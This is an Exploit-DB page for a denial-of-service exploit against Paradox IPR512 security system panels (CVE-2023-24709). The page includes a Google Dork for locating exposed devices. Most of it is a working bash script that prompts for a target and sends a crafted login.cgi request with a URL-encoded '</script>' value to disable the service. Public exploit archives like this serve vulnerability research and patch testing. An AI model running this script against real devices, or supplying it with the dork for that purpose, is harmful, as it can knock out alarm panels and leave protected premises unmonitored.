Paradox Security Systems IPR512 - Denial Of Service

EDB-ID:

51356

CVE:

2023-24709

EDB Verified:

Author:

Giorgi Dograshvili

Type:

dos

Exploit:   /  

Platform:

Hardware

Date:

2023-04-10

Vulnerable App: 
#!/bin/bash

# Exploit Title: Paradox Security Systems IPR512 - Denial Of Service
# Google Dork: intitle:"ipr512 * - login screen"
# Date: 09-APR-2023
# Exploit Author: Giorgi Dograshvili
# Vendor Homepage: Paradox - Headquarters <https://www.paradox.com/Products/default.asp?PID=423> (https://www.paradox.com/Products/default.asp?PID=423)
# Version: IPR512
# CVE : CVE-2023-24709

# Function to display banner message
display_banner() {
  echo "******************************************************"
  echo "*                                                    *"
  echo "*                PoC CVE-2023-24709                  *"
  echo "*      BE AWARE!!! RUNNING THE SCRIPT WILL MAKE      *"
  echo "*    A DAMAGING IMPACT ON THE SERVICE FUNCTIONING!   *"
  echo "*                                by SlashXzerozero   *"
  echo "*                                                    *"
  echo "******************************************************"
}

# Call the function to display the banner
display_banner
  echo ""
  echo ""
  echo "Please enter a domain name or IP address with or without port"
read -p  "(e.g. example.net or 192.168.12.34, or 192.168.56.78:999): " domain

# Step 2: Ask for user confirmation
read -p "This will DAMAGE the service. Do you still want it to proceed? (Y/n): " confirm
if [[ $confirm == "Y" || $confirm == "y" ]]; then
  # Display loading animation
  animation=("|" "/" "-" "\\")
  index=0
  while [[ $index -lt 10 ]]; do
    echo -ne "Loading ${animation[index]} \r"
    sleep 1
    index=$((index + 1))
  done

  # Use curl to send HTTP GET request with custom headers and timeout
  response=$(curl -i -s -k -X GET \
    -H "Host: $domain" \
    -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36" \
    -H "Accept: */" \
    -H "Referer: http://$domain/login.html" \
    -H "Accept-Encoding: gzip, deflate" \
    -H "Accept-Language: en-US,en;q=0.9" \
    -H "Connection: close" \
    --max-time 10 \
    "http://$domain/login.cgi?log_user=%3c%2f%73%63%72%69%70%74%3e&log_passmd5=&r=3982")

  # Check response for HTTP status code 200 and print result
  if [[ $response == *"HTTP/1.1 200 OK"* ]]; then
    echo -e "\nIt seems to be vulnerable! Please check the webpanel: http://$domain/login.html"
  else
    echo -e "\nShouldn't be vulnerable! Please check the webpanel:  http://$domain/login.html"
  fi
else
  echo "The script is stopped!."
fi
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services